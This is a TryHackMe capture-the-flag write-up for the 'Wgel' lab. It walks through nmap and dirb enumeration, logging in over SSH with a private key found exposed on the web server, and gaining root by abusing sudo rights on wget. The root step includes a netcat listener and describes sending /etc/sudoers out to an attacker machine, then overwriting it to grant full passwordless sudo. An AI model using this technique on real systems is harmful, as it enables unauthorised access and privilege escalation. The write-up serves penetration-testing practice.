TryHackMe — Wgel CTF Writeup

Wgel is a TryHackMe Machine. It’s an easy level machine to demonstrate the basics of system hacking. TryHackMe provides almost free labs to study and practice penetration testing and CTF based skills needed for a pen-tester.

Enumeration

NMAP Scan

So, we first use a tool called NMap to scan the IP address to know which services are running and what vulnerabilities it might hold.

nmap -T4 -A -v {IP Address of victim machine}

From the above results we find out majorly 2 Ports are active:

So we use enumerate on port 80 as it hosts a website. On opening the website we find it is hosting a default Apache UBUNTU server.

Source Code Enumeration

After going through the source code of the page, we find:

Hmm, looks like we found that there is a user named ‘Jessie’.

DIRB enumeration

Here we use a tool called DIRB (Directory Buster). It shows us possible directory routes on this portal.

DIRB returned some awesome data:

Looks like we have hit a Jackpot!

http://10.10.3.112/sitemap/.ssh/

On browsing to that URL, we find a private RSA key for a user’s SSH

FootHold

Footholding is getting a basic control over a system with minimum privileges to execute a reverse shell or read/write private information.

Save the above RSA Priv Key to a .ppk format and use

Load an existing private key file.

And after that click on Save Private key .

After that open PuttY and Click Connection > SSH > Auth in the left navigation pane and configure the SSH private key to use by clicking Browse under Private key file for authentication.

Then Login using PuttY

With username Being:’jessie’ we found before.

Going into Documents Folder we find the user_flag.txt

Root Privilege Escalation

Root Privilege Escalation is required to get the highest permissions to system. A root user can do anything with system, including the system source files itself.

On Doing sudo -l (this commands lists all the )

Found the Vulnerability LPE (Local Privilege Escalation)

So We have sudo permissions for wget, I wonder what we can do.

• UPLOAD to attacker machine
• Download to attacker machine
• Re/Write Files on PWN machine
• Read Files on PWN machine

So we can directly upload /root/root_flag.txt to Our machine but thats not enough in real life. So we will rewrite the /etc/sudoers file. This file is responsible for giving sudo-without-password permissions to various users and programs.

Start a reverse shell listener on your attacking machine. So as to create a communication between the victim and the attacker machine.

nc -lvnp 80

And then we will write this :

The wget command sends the /etc/sudoers file to the provided IP.

You will get this type of output on your attacking machine:

Save The Data To a file named sudoer2
Edit out the NOPASSWD: /usr/bin/wget Portion to NOPASSWD: ALL using ONLY VISUDO

And download it back to victim machine

VOILA!!

VOILA! We found the root flag which means we pwned the machine.